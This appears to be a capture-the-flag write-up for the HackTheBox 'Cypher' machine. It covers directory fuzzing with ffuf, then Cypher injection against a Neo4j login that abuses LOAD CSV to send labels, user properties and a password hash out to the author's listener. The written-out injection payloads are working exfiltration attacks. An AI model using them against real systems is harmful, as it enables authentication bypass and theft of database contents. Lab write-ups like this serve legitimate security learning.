80

adot@pwndot:~/htb/cypher$ echo 10.10.11.57 cypher.htb | sudo tee -a /etc/hosts
[sudo] password for adot:
10.10.11.57 cypher.htb

http://cypher.htb/

adot@pwndot:~/htb/cypher$ ffuf -w ~/opt/wordlists/directory-list-2.3-medium.txt -u http://cypher.htb/FUZZ -e html -t 200

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://cypher.htb/FUZZ
 :: Wordlist         : FUZZ: /home/adot/opt/wordlists/directory-list-2.3-medium.txt
 :: Extensions       : html
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

about                   [Status: 200, Size: 4986, Words: 1117, Lines: 179, Duration: 48ms]
login                   [Status: 200, Size: 3671, Words: 863, Lines: 127, Duration: 50ms]
index                   [Status: 200, Size: 4562, Words: 1285, Lines: 163, Duration: 51ms]
                        [Status: 200, Size: 4562, Words: 1285, Lines: 163, Duration: 55ms]
demo                    [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 52ms]
api                     [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 54ms]
testing                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 50ms]
                        [Status: 200, Size: 4562, Words: 1285, Lines: 163, Duration: 46ms]
:: Progress: [441096/441096] :: Job [1/1] :: 4201 req/sec :: Duration: [0:01:44] :: Errors: 0 ::

http://cypher.htb/testing/

http://cypher.htb/login

Add a '

Cypher Injection Cheat SheetPentester Land

Was able to bypass the authentication query but not completely due to the app.py verifying the hash

adot@pwndot:~/htb/cypher/cyphermap$ echo Adot > test.txt

adot@pwndot:~/htb/cypher/cyphermap$ updog -p 80

' OR 1=1 LOAD CSV FROM 'http://10.10.14.18/test.txt' AS x LOAD CSV FROM 'http://10.10.14.18/'+x[0] AS y RETURN ''//

Tables

' OR 1=1 WITH 1337 AS x CALL db.labels() YIELD label AS d LOAD CSV FROM 'http://10.10.14.18/'+d AS y RETURN y//

' OR 1=1 WITH 1 as a MATCH (u:USER) UNWIND keys(u) as p LOAD CSV FROM 'http://10.10.14.18:80/?' + p +'='+toString(u[p]) as l RETURN 0 as _0 //

graphasm

' OR 1=1 WITH 1 as a MATCH (f:SHA1) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.18:80/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //

9f54ca4c130be6d529a56dee59dc2b2090e43acf

Can't crack the hash

PreviousEumeration NextPage 1

Last updated 3 months ago

Was this helpful?